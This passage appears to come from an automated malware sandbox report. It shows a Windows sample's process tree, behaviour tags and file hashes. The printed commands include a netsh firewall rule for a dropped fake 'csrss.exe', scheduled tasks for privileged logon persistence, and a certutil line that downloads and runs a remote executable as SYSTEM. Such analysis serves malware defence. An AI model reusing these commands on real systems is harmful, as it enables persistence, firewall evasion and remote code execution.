- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:1964
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:936 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:1744
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:1000
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129193323.log C:\Windows\Logs\CBS\CbsPersist_20230129193323.cab1⤵
- Drops file in Windows directory
PID:1352
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD55625cb2982b7118b5e262fcfea2f4851
SHA1f34e4c803b7b89d5342d50aa42b2cbd55845e373
SHA256a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e
SHA51278f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0
-
Filesize
3.9MB
MD55625cb2982b7118b5e262fcfea2f4851
SHA1f34e4c803b7b89d5342d50aa42b2cbd55845e373
SHA256a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e
SHA51278f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0
-
Filesize
3.9MB
MD55625cb2982b7118b5e262fcfea2f4851
SHA1f34e4c803b7b89d5342d50aa42b2cbd55845e373
SHA256a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e
SHA51278f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0